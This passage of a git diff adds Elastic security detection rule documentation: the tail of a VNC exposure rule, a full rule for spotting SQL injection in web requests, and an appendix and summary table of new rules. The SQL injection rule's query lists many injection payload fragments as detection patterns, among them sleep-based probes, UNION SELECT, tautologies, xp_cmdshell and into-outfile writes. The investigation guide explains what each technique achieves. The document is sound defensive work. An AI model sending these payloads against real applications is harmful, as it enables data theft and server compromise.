may trigger the rule if VNC is used for legitimate remote administration. To manage this, create exceptions for known internal IP addresses that frequently use VNC for maintenance. +- Automated scripts or tools that use VNC for legitimate purposes might be flagged. Identify these tools and whitelist their IP addresses to prevent unnecessary alerts. +- Testing environments that simulate external access to VNC for security assessments can cause false positives. Exclude IP ranges associated with these environments to avoid confusion. +- Cloud-based services that use VNC for remote management might be misidentified as threats. Verify these services and add their IP addresses to an exception list if they are trusted. +- Temporary remote access setups for troubleshooting or support can be mistaken for unauthorized access. Document these instances and apply temporary exceptions to reduce false alerts. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration. +- Terminate any active VNC sessions that are identified as originating from external networks to cut off potential attacker access. +- Conduct a thorough review of system logs and network traffic to identify any unauthorized access or data transfer that may have occurred during the VNC exposure. +- Change all passwords and credentials associated with the affected system and any other systems that may have been accessed using the same credentials. +- Apply necessary patches and updates to the VNC software and any other vulnerable applications on the affected system to mitigate known vulnerabilities. +- Implement network segmentation to ensure that VNC services are only accessible from trusted internal networks and not exposed to the internet. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems may be compromised. + +==== Rule query + + +[source, js] +---------------------------------- +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow) or event.category:(network or network_traffic)) and + network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and + source.ip:( + 10.0.0.0/8 or + 172.16.0.0/12 or + 192.168.0.0/16 + ) and + not destination.ip:( + 10.0.0.0/8 or + 127.0.0.0/8 or + 169.254.0.0/16 or + 172.16.0.0/12 or + 192.0.0.0/24 or + 192.0.0.0/29 or + 192.0.0.8/32 or + 192.0.0.9/32 or + 192.0.0.10/32 or + 192.0.0.170/32 or + 192.0.0.171/32 or + 192.0.2.0/24 or + 192.31.196.0/24 or + 192.52.193.0/24 or + 192.168.0.0/16 or + 192.88.99.0/24 or + 224.0.0.0/4 or + 100.64.0.0/10 or + 192.175.48.0/24 or + 198.18.0.0/15 or + 198.51.100.0/24 or + 203.0.113.0/24 or + 240.0.0.0/4 or + "::1" or + "FE80::/10" or + "FF00::/8" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: VNC +** ID: T1021.005 +** Reference URL: https://attack.mitre.org/techniques/T1021/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-web-server-potential-sql-injection-request.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-web-server-potential-sql-injection-request.asciidoc new file mode 100644 index 0000000000..170c36542f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-web-server-potential-sql-injection-request.asciidoc @@ -0,0 +1,243 @@ +[[prebuilt-rule-8-19-32-web-server-potential-sql-injection-request]] +=== Web Server Potential SQL Injection Request + +This rule detects potential SQL injection attempts in web server requests by identifying common SQL injection patterns in URLs. Such activity may indicate reconnaissance or exploitation attempts by attackers trying to manipulate backend databases or extract sensitive information. + +*Rule type*: eql + +*Rule indices*: + +* logs-nginx.access-* +* logs-apache.access-* +* logs-apache_tomcat.access-* +* logs-iis.access-* +* logs-traefik.access-* +* logs-zeek.http-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Web +* Domain: Network +* Use Case: Threat Detection +* Tactic: Reconnaissance +* Tactic: Credential Access +* Tactic: Persistence +* Tactic: Execution +* Tactic: Command and Control +* Data Source: Nginx +* Data Source: Apache +* Data Source: Apache Tomcat +* Data Source: IIS +* Data Source: Traefik +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Web Server Potential SQL Injection Request* + + +SQL injection (SQLi) attempts to manipulate backend database queries via unsanitized +input passed through web request parameters. This rule flags requests whose URL or +query string contains structural patterns characteristic of automated SQLi tooling +(sqlmap and similar) or manual exploitation techniques, spanning boolean-blind, +time-based, error-based, and UNION-based extraction methods across MySQL, MSSQL, +PostgreSQL, and Oracle syntax. + + +*Possible investigation steps* + + +- Identify the full request and response context: + - `url.original` / `url.query` — full injected payload + - `http.request.method`, `http.response.status_code` — was the request accepted (2xx) or rejected (4xx/5xx/WAF block)? + - `source.ip`, `source.as.organization.name`, `source.geo.*` — is this a known scanner IP, hosting/VPS ASN, or unexpected geography for this application's userbase? + - `user_agent.original` — check for tool signatures (`sqlmap`, `Assetnote`, `Nessus`, `Nuclei`, etc.) vs. a spoofed browser UA +- Determine which SQLi technique is present, since it changes the likely intent and next steps: + - **Boolean-blind** (`AND 1=1--`, `CASE WHEN...THEN...ELSE`) — attacker inferring true/false conditions one bit/char at a time; usually high request volume against the same parameter + - **Time-based blind** (`SLEEP`, `BENCHMARK`, `WAITFOR DELAY`, `pg_sleep`) — look for abnormal response latency on matching requests to confirm exploitation succeeded vs. was blocked + - **Error-based** (`EXTRACTVALUE`, `UPDATEXML`, `GTID_SUBSET`, `CONVERT(INT,...)`) — check `http.response.status_code`/body for a 500 or a reflected DB error message; if present, the attacker likely received leaked data directly + - **UNION-based** (`UNION SELECT NULL,...`, `UNION ALL SELECT...CONCAT(MD5(...`) — attacker is enumerating column count or confirming a reflection point to pull data directly into the page body + - **Stacked queries** (`;SELECT...`, `;EXEC xp_cmdshell`) — most severe; if the DB driver allows multiple statements, this can lead to command execution (`xp_cmdshell`) rather than just data disclosure +- Pivot on the target parameter and endpoint (e.g. `url.path`, the specific query-string key such as `id=`, `sort=`, `column=`) to see: + - How many distinct payloads/techniques were tried against the same parameter (suggests automated technique-fuzzing by a single tool run) + - Whether the same `source.ip` hit multiple endpoints/parameters (broader scan) or repeatedly refined one payload (targeted exploitation attempt) +- Check for a correlated spike in requests from the same IP/ASN in a tight time window — sqlmap and similar tools generate many rapid, near-identical requests when fuzzing technique/column count/character position. +- If the backend database technology is known, cross-check the payload's SQL dialect (MySQL vs. MSSQL vs. PostgreSQL functions) against what the application actually runs — a payload using the wrong dialect's functions will simply error out and fail, lowering severity. +- If available, correlate with database-side audit logs (e.g. MSSQL Audit `event.code: 33205`, slow query logs) for the same timeframe/client IP to confirm whether the payload actually reached and executed against the database. + + +*False positive analysis* + + +- **Vulnerability scanners and security tooling** are the most common source of noise: Assetnote, Burp Suite, Qualys, Nessus, Acunetix, and similar tools intentionally send these exact payloads as part of authorized scanning. Check `user_agent.original` for scanner signatures and cross-reference `source.ip`/ASN against your organization's known scanning infrastructure or third-party ASM vendor. +- Legitimate application traffic containing SQL-like keywords is rare given the specificity of these patterns (chained `CHAR()` calls, `ELT(n=n,1)` self-comparisons, hex-delimited `CONCAT`), but verify against applications that accept raw SQL fragments as legitimate input (e.g., internal admin/reporting tools with a "custom query" field) if any exist in your environment. +- Consider adding a suppression/exception for confirmed, recurring authorized scanning sources rather than tuning the query patterns themselves, to avoid reducing detection coverage against real attackers using the same tools. + + +*Response and remediation* + + +- If the request reached the application layer unblocked (`event.outcome: success` / 2xx response) and the payload matches an error-based or UNION-based technique, treat as a potential confirmed data exposure — check application/database logs for evidence of returned sensitive data. +- If a stacked-query or `xp_cmdshell` payload succeeded, escalate immediately — this can lead to OS-level command execution, not just data disclosure. +- Validate that the affected endpoint uses parameterized queries/prepared statements; SQL injection at this scale of tooling almost always indicates raw string concatenation in the query layer. +- If exploitation is confirmed, review the database account's privileges used by the web application (least privilege should prevent `xp_cmdshell`, `INFORMATION_SCHEMA` enumeration, or cross-database access even if injection succeeds). +- Block or rate-limit the source IP/ASN at the WAF or reverse proxy if not already filtered, and consider a virtual-patch WAF rule for the specific vulnerable parameter while the application fix is developed. +- Review other requests from the same source IP across the retention window for prior reconnaissance (e.g., directory enumeration, parameter fuzzing) that may have preceded the injection attempt. + + +==== Rule query + + +[source, js] +---------------------------------- +any where ( +url.original like~ ( + "*dbms_pipe.receive_message%28chr%*", + "*waitfor%20delay%20%270%3a0%3a*", + "*%28select%28sleep%285*", "*%28select%20*from%20pg_sleep%285*", "*%3bselect%20pg_sleep%285*", + "*and%20sleep%28*%29*", "*or%20sleep%28*%29*", "*case%20when*then%20sleep%28*", "*if%28sleep%28*%29*", + "*benchmark%28*%2c*md5%28*", + "*convert%28int%2c%28select%20char%28*", + "*char%28*char%28*char%28*char%28*", + "*concat%28concat%28char%28*", + "*case%20when%20%28*%3d*%29%20then*else*end*", + "*elt%28*%3d*%2c1%29%29*", + "*union%20select%20null%2cnull*", "*union%20all%20select%20null*", + "*union%20all%20select%20*concat%28md5%28*", + "*extractvalue%28*concat%280x*", "*updatexml%28*concat%280x*", + "*procedure%2f%2a%2a%2fanalyse%28extractvalue%28*", + "*gtid_subset%28concat%280x*", "*gtid_subtract%28concat%280x*", + "*mid%28ifnull%28session_user%28%29*", + "*'qq'%2b%28%28select%20@@version%29%29%2b'qq'*", + "*%27%20or%20%271%27%3d%271*", "*%22%20or%20%221%22%3d%221*", "*%27%20or%20%27a%27%3d%27a*", + "*and%201%3d1--*", "*and%201%3d2--*", + "*%29%3bselect*if%28%28ord%28mid%28*", + "*xp_cmdshell*", + "*select%20*into%20outfile*", "*select%20*into%20dumpfile*", + "*load_file%28*", "*load%5ffile%28*", + "*select%20*from%20information_schema.tables*", "*from%20information_schema.columns%20where%20table_schema*", + "*dbms_pipe%2ereceive_message*", "*dbms_lock%2esleep*", + "*select%20@@version*", "*select%20user%28%29*", "*select%20current_user%28%29*", "*select%20database%28%29*", + "*sp_executesql%20*exec%20*", "*xp_dirtree*" + ) + or + url.query like~ ( + "*dbms_pipe.receive_message(chr*", + "*waitfor delay '0:0:*", + "*(select(sleep(5*", "*(select*from pg_sleep(5*", "*;select pg_sleep(5*", + "*and sleep(*)*", "*or sleep(*)*", "*case when*then sleep(*", "*if(sleep(*)*", + "*benchmark(*,*md5(*", + "*convert(int,(select char(*", + "*char(*char(*char(*char(*", + "*concat(concat(char(*", + "*case when (*=*) then*else*end*", + "*elt(*=*,1))*", + "*union select null,null*", "*union all select null*", + "*union all select*concat(md5(*", + "*extractvalue(*concat(0x*", "*updatexml(*concat(0x*", + "*procedure/**/analyse(extractvalue(*", + "*gtid_subset(concat(0x*", "*gtid_subtract(concat(0x*", + "*mid(ifnull(session_user()*", + "*'qq'+((select @@version))+'qq'*", + "*' or '1'='1*", "*\" or \"1\"=\"1*", "*' or 'a'='a*", + "*and 1=1--*", "*and 1=2--*", + "*);select*if((ord(mid(*", + "*xp_cmdshell*", + "*select*into outfile*", "*select*into dumpfile*", + "*load_file(*", + "*select*from information_schema.tables*", "*from information_schema.columns where table_schema*", + "*dbms_pipe.receive_message*", "*dbms_lock.sleep*", + "*select @@version*", "*select user()*", "*select current_user()*", "*select database()*", + "*sp_executesql*exec*", "*xp_dirtree*" + ) +) and +not user_agent.original like~ ( + "*Nessus*", "*Qualys*", "*Acunetix*", "*Tenable*", "*CensysInspect*", "*Detectify*", + "*Assetnote*", "*ExposureScan*", "*RecordedFuture*", "*AppSpider*", "*WebInspect*", + "*Rapid7*", "*InsightVM*", "*Probely*" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Vulnerability Scanning +** ID: T1595.002 +** Reference URL: https://attack.mitre.org/techniques/T1595/002/ +* Sub-technique: +** Name: Wordlist Scanning +** ID: T1595.003 +** Reference URL: https://attack.mitre.org/techniques/T1595/003/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-appendix.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-appendix.asciidoc new file mode 100644 index 0000000000..bfb14c9b16 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-appendix.asciidoc @@ -0,0 +1,134 @@ +["appendix",role="exclude",id="prebuilt-rule-8-19-32-prebuilt-rules-8-19-32-appendix"] += Downloadable rule update v8.19.32 + +This section lists all updates associated with version 8.19.32 of the Fleet integration *Prebuilt Security Detection Rules*. + + +include::prebuilt-rule-8-19-32-claude-cowork-vm-boot-image-tamper.asciidoc[] +include::prebuilt-rule-8-19-32-suspicious-process-execution-by-zoom.asciidoc[] +include::prebuilt-rule-8-19-32-suspicious-java-class-file-created-in-papercut-server-library.asciidoc[] +include::prebuilt-rule-8-19-32-aws-getfederationtoken-followed-by-console-login-via-federation-exchange.asciidoc[] +include::prebuilt-rule-8-19-32-aws-detective-graph-deleted.asciidoc[] +include::prebuilt-rule-8-19-32-aws-guardduty-publishing-destination-deleted.asciidoc[] +include::prebuilt-rule-8-19-32-aws-guardduty-threat-intelligence-set-deleted.asciidoc[] +include::prebuilt-rule-8-19-32-aws-eks-access-entry-created-then-deleted-by-same-identity.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user.asciidoc[] +include::prebuilt-rule-8-19-32-aws-bedrock-agentcore-resource-created-with-iam-execution-role.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ses-email-identity-verified-then-deleted.asciidoc[] +include::prebuilt-rule-8-19-32-gcp-secret-manager-listsecrets-across-multiple-projects.asciidoc[] +include::prebuilt-rule-8-19-32-process-execution-followed-by-self-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-suspicious-reading-of-procfs-syscall-file.asciidoc[] +include::prebuilt-rule-8-19-32-file-downloaded-by-curl-wget-and-piped-to-interpreter.asciidoc[] +include::prebuilt-rule-8-19-32-binfmt-configuration-file-creation.asciidoc[] +include::prebuilt-rule-8-19-32-ssfilecopysender-executed-as-root.asciidoc[] +include::prebuilt-rule-8-19-32-ssfilecopyreceiver-writing-to-common-persistence-locations.asciidoc[] +include::prebuilt-rule-8-19-32-potential-dns-tunneling-via-long-and-unique-subdomains.asciidoc[] +include::prebuilt-rule-8-19-32-potential-self-signed-tls-certificate-recently-issued-on-external-connection.asciidoc[] +include::prebuilt-rule-8-19-32-potential-dns-rebinding-from-public-to-private-address.asciidoc[] +include::prebuilt-rule-8-19-32-first-seen-sonicwall-remote-access-login-by-user-and-source.asciidoc[] +include::prebuilt-rule-8-19-32-potential-evasion-via-boot-time-removal-tool.asciidoc[] +include::prebuilt-rule-8-19-32-suspicious-child-process-of-papercut-server-component.asciidoc[] +include::prebuilt-rule-8-19-32-elastic-agent-service-terminated.asciidoc[] +include::prebuilt-rule-8-19-32-elastic-defend-alert-followed-by-telemetry-loss.asciidoc[] +include::prebuilt-rule-8-19-32-potential-java-service-exploitation-via-suspicious-child-process.asciidoc[] +include::prebuilt-rule-8-19-32-web-server-potential-sql-injection-request.asciidoc[] +include::prebuilt-rule-8-19-32-first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc[] +include::prebuilt-rule-8-19-32-aws-systems-manager-securestring-parameter-request-with-decryption-flag.asciidoc[] +include::prebuilt-rule-8-19-32-aws-bedrock-guardrail-deleted-or-weakened.asciidoc[] +include::prebuilt-rule-8-19-32-aws-cloudwatch-alarm-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-config-resource-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-vpc-flow-logs-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-guardduty-detector-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-s3-bucket-configuration-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-s3-bucket-expiration-lifecycle-configuration-added.asciidoc[] +include::prebuilt-rule-8-19-32-aws-s3-bucket-server-access-logging-disabled.asciidoc[] +include::prebuilt-rule-8-19-32-insecure-aws-ec2-vpc-security-group-ingress-rule-added.asciidoc[] +include::prebuilt-rule-8-19-32-aws-waf-access-control-list-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-waf-rule-or-rule-group-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ec2-user-data-retrieval-for-ec2-instance.asciidoc[] +include::prebuilt-rule-8-19-32-aws-sts-getcalleridentity-api-called-for-the-first-time.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ssm-inventory-reconnaissance-by-rare-user.asciidoc[] +include::prebuilt-rule-8-19-32-aws-lambda-layer-added-to-existing-function.asciidoc[] +include::prebuilt-rule-8-19-32-first-time-aws-cloudformation-stack-creation.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ec2-ami-shared-with-another-account.asciidoc[] +include::prebuilt-rule-8-19-32-aws-s3-bucket-policy-added-to-share-with-external-account.asciidoc[] +include::prebuilt-rule-8-19-32-aws-s3-bucket-replicated-to-another-account.asciidoc[] +include::prebuilt-rule-8-19-32-aws-sns-rare-protocol-subscription-by-user.asciidoc[] +include::prebuilt-rule-8-19-32-aws-eventbridge-rule-disabled-or-deleted.asciidoc[] +include::prebuilt-rule-8-19-32-aws-cloudtrail-log-updated.asciidoc[] +include::prebuilt-rule-8-19-32-aws-cloudwatch-log-group-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-cloudwatch-log-stream-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ec2-encryption-disabled.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ec2-ebs-snapshot-access-removed.asciidoc[] +include::prebuilt-rule-8-19-32-aws-efs-file-system-deleted.asciidoc[] +include::prebuilt-rule-8-19-32-aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-lambda-function-deletion.asciidoc[] +include::prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deleted.asciidoc[] +include::prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deletion-protection-disabled.asciidoc[] +include::prebuilt-rule-8-19-32-aws-s3-object-versioning-suspended.asciidoc[] +include::prebuilt-rule-8-19-32-aws-suspicious-user-agent-fingerprint.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-creation.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ec2-security-group-configuration-change.asciidoc[] +include::prebuilt-rule-8-19-32-aws-iam-oidc-provider-created-by-rare-user.asciidoc[] +include::prebuilt-rule-8-19-32-aws-iam-user-created-access-keys-for-another-user.asciidoc[] +include::prebuilt-rule-8-19-32-aws-lambda-function-policy-updated-to-allow-public-invocation.asciidoc[] +include::prebuilt-rule-8-19-32-aws-lambda-function-url-created-with-public-access.asciidoc[] +include::prebuilt-rule-8-19-32-aws-rds-db-instance-made-public.asciidoc[] +include::prebuilt-rule-8-19-32-aws-route-53-private-hosted-zone-associated-with-a-vpc.asciidoc[] +include::prebuilt-rule-8-19-32-aws-ec2-route-table-created.asciidoc[] +include::prebuilt-rule-8-19-32-aws-iam-customer-managed-policy-version-created-or-default-version-set.asciidoc[] +include::prebuilt-rule-8-19-32-aws-kms-key-policy-updated-via-putkeypolicy.asciidoc[] +include::prebuilt-rule-8-19-32-entra-id-sharepoint-or-onedrive-accessed-by-unusual-client.asciidoc[] +include::prebuilt-rule-8-19-32-entra-id-oauth-user-impersonation-scope-for-unusual-user-and-client.asciidoc[] +include::prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-client.asciidoc[] +include::prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-authentication-type.asciidoc[] +include::prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-non-managed-device.asciidoc[] +include::prebuilt-rule-8-19-32-azure-rbac-built-in-administrator-roles-assigned.asciidoc[] +include::prebuilt-rule-8-19-32-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc[] +include::prebuilt-rule-8-19-32-kubernetes-pod-exec-cloud-instance-metadata-access.asciidoc[] +include::prebuilt-rule-8-19-32-kubernetes-pod-exec-sensitive-file-or-credential-path-access.asciidoc[] +include::prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-with-suspicious-user-agent.asciidoc[] +include::prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-from-node-or-pod-service-account.asciidoc[] +include::prebuilt-rule-8-19-32-kubernetes-secrets-list-across-cluster-or-sensitive-namespaces.asciidoc[] +include::prebuilt-rule-8-19-32-kubernetes-pod-exec-with-curl-or-wget-to-https.asciidoc[] +include::prebuilt-rule-8-19-32-kubernetes-pod-exec-potential-reverse-shell.asciidoc[] +include::prebuilt-rule-8-19-32-linux-clipboard-activity-detected.asciidoc[] +include::prebuilt-rule-8-19-32-sensitive-files-compression.asciidoc[] +include::prebuilt-rule-8-19-32-suspicious-proc-maps-discovery.asciidoc[] +include::prebuilt-rule-8-19-32-unusual-file-creation-via-web-server.asciidoc[] +include::prebuilt-rule-8-19-32-potential-privilege-escalation-via-unshare-and-uid-change.asciidoc[] +include::prebuilt-rule-8-19-32-potential-privilege-escalation-via-suid-sgid.asciidoc[] +include::prebuilt-rule-8-19-32-dumping-account-hashes-via-built-in-commands.asciidoc[] +include::prebuilt-rule-8-19-32-suspicious-web-browser-sensitive-file-access.asciidoc[] +include::prebuilt-rule-8-19-32-potential-privacy-control-bypass-via-tccdb-modification.asciidoc[] +include::prebuilt-rule-8-19-32-remote-ssh-login-enabled-via-systemsetup-command.asciidoc[] +include::prebuilt-rule-8-19-32-finder-sync-plugin-registered-and-enabled.asciidoc[] +include::prebuilt-rule-8-19-32-cobalt-strike-command-and-control-beacon.asciidoc[] +include::prebuilt-rule-8-19-32-roshal-archive-rar-or-powershell-file-downloaded-from-the-internet.asciidoc[] +include::prebuilt-rule-8-19-32-possible-fin7-dga-command-and-control-behavior.asciidoc[] +include::prebuilt-rule-8-19-32-newly-observed-ipsec-nat-traversal-peer.asciidoc[] +include::prebuilt-rule-8-19-32-smtp-to-the-internet-on-port-26-tcp.asciidoc[] +include::prebuilt-rule-8-19-32-vnc-virtual-network-computing-from-the-internet.asciidoc[] +include::prebuilt-rule-8-19-32-vnc-virtual-network-computing-to-the-internet.asciidoc[] +include::prebuilt-rule-8-19-32-rpc-remote-procedure-call-from-the-internet.asciidoc[] +include::prebuilt-rule-8-19-32-rpc-remote-procedure-call-to-the-internet.asciidoc[] +include::prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-from-the-internet.asciidoc[] +include::prebuilt-rule-8-19-32-smb-windows-file-sharing-activity-to-the-internet.asciidoc[] +include::prebuilt-rule-8-19-32-potential-computer-account-ntlm-relay-activity.asciidoc[] +include::prebuilt-rule-8-19-32-rare-connection-to-webdav-target.asciidoc[] +include::prebuilt-rule-8-19-32-potential-masquerading-as-system32-dll.asciidoc[] +include::prebuilt-rule-8-19-32-potential-timestomp-in-executable-files.asciidoc[] +include::prebuilt-rule-8-19-32-installation-of-custom-shim-databases.asciidoc[] +include::prebuilt-rule-8-19-32-potential-application-shimming-via-sdbinst.asciidoc[] +include::prebuilt-rule-8-19-32-potential-iis-web-shell-file-creation.asciidoc[] +include::prebuilt-rule-8-19-32-deprecated-sunburst-command-and-control-activity.asciidoc[] +include::prebuilt-rule-8-19-32-gke-service-account-token-created-via-tokenrequest-api.asciidoc[] +include::prebuilt-rule-8-19-32-deprecated-encoded-executable-stored-in-the-registry.asciidoc[] +include::prebuilt-rule-8-19-32-deprecated-potential-powershell-obfuscated-script.asciidoc[] +include::prebuilt-rule-8-19-32-kubernetes-denied-service-account-request-via-unusual-user-agent.asciidoc[] +include::prebuilt-rule-8-19-32-kubernetes-unusual-decision-by-user-agent.asciidoc[] +include::prebuilt-rule-8-19-32-deprecated-m365-security-compliance-email-reported-by-user-as-malware-or-phish.asciidoc[] +include::prebuilt-rule-8-19-32-deprecated-adobe-hijack-persistence.asciidoc[] +include::prebuilt-rule-8-19-32-mfa-disabled-for-google-workspace-organization.asciidoc[] +include::prebuilt-rule-8-19-32-deprecated-suspicious-printspooler-service-executable-file-creation.asciidoc[] diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-summary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-summary.asciidoc new file mode 100644 index 0000000000..95a2320331 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-summary.asciidoc @@ -0,0 +1,268 @@ +[[prebuilt-rule-8-19-32-prebuilt-rules-8-19-32-summary]] +[role="xpack"] +== Update v8.19.32 + +This section lists all updates associated with version 8.19.32 of the Fleet integration *Prebuilt Security Detection Rules*. + + +[width="100%",options="header"] +|============================================== +|Rule |Description |Status |Version + +|<> | Detects unexpected modification of Claude Desktop Cowork VM boot images (kernel, initrd, root filesystem). Adversaries with user-context access can rewrite these stored images so later Cowork sessions boot attacker-controlled code inside a virtual instance that host EDR cannot inspect by default. | new | 1 + +|<> | Identifies suspicious process execution associated with the Zoom desktop client on macOS and Linux. The rule detects shells, script interpreters, downloaders, and network utilities spawned by Zoom on either platform. On Linux, it also detects Zoom replacing its own process image with an executable outside the Zoom installation directory. These behaviors may indicate successful exploitation of a Zoom client vulnerability, including CVE-2026-53413. | new | 1 + +|<> | Detects creation of Java .class files within the PaperCut NG/MF Application Server library directory. During active exploitation of CVE-2026-82078 (chained with CVE-2026-81578), attackers deliver hex-encoded malicious .class payloads into the PaperCut server/lib path (observed examples include Udydn.class and Moo97.class) so arbitrary bytecode executes inside the PaperCut JVM / Application Server process. | new | 1 + +|<> | Detects the three-event chain produced by tools like aws_consoler that convert exfiltrated long-term IAM access keys into browser-accessible AWS console sessions: GetFederationToken obtains temporary credentials, GetSigninToken exchanges them for a federation sign-in token via the AWS federation endpoint, and ConsoleLogin confirms the resulting console session was opened — all from the same source IP within two minutes. This sequence is a high-confidence indicator of credential abuse using stolen IAM access keys. | new | 1 + +|<> | Detects the deletion of an Amazon Detective behavior graph via the DeleteGraph API. Amazon Detective automatically collects log data from AWS services and uses machine learning, statistical analysis, and graph theory to build an interactive model of resource behaviors and interactions. Deleting a behavior graph destroys its historical analysis data and removes the ability to investigate security incidents using Detective's relationship mapping. An attacker with sufficient IAM permissions may delete the Detective graph to impair forensic investigation of a compromise. | new | 1 + +|<> | Detects the deletion of an Amazon GuardDuty publishing destination. Publishing destinations export GuardDuty findings to S3, Security Lake, or EventBridge for long-term retention and SIEM ingestion. An adversary with GuardDuty administrative access may delete a publishing destination to prevent findings from reaching external storage or a security operations center, reducing the visibility of their activity while leaving the GuardDuty detector active. | new | 1 + +|<> | Detects the deletion of an Amazon GuardDuty threat intelligence set. Threat intelligence sets are custom lists of known-malicious IP addresses or domains that GuardDuty uses to generate findings when monitored resources communicate with those indicators. Deleting a threat intel set degrades GuardDuty's detection capability for known adversary infrastructure, allowing communication with threat-actor-controlled IP ranges to go undetected. | new | 1 + +|<> | Detects the creation of an Amazon EKS access entry followed by its deletion by the same identity within a short time window. EKS access entries define Kubernetes RBAC-level permissions for IAM principals in an EKS cluster. An adversary with EKS administrative access may temporarily grant themselves cluster access, use those permissions to create Kubernetes RBAC resources (ClusterRoleBindings, ServiceAccounts with privileged roles), and then delete the access entry to hide the evidence of the initial grant while retaining access through the Kubernetes-level backdoor. | new | 1 + +|<> | Detects the first occurrence in 7 days of an AWS identity attaching the managed policy AmazonSESFullAccess to an IAM user, role, or group. AmazonSESFullAccess grants unrestricted permission to send email, manage identities and templates, manage suppression lists, and access SES account-level settings. Granting this policy to an unexpected IAM entity, particularly a newly created user or a role not previously associated with email operations, is a documented technique used by threat actors to establish phishing infrastructure on compromised AWS accounts, enabling them to send email on behalf of the victim organization's trusted sending domain. Using new terms on the calling identity suppresses recurring attachments by known email automation while surfacing identities performing this action for the first time. | new | 1 + +|<> | Detects the creation of an AWS Bedrock AgentCore resource (code interpreter, agent runtime, browser, or harness) with an IAM execution role attached. When an attacker with iam:PassRole permission creates an AgentCore resource and attaches a privileged role, subsequent invocations inside that resource execute as the attached role — enabling privilege escalation to roles that trust 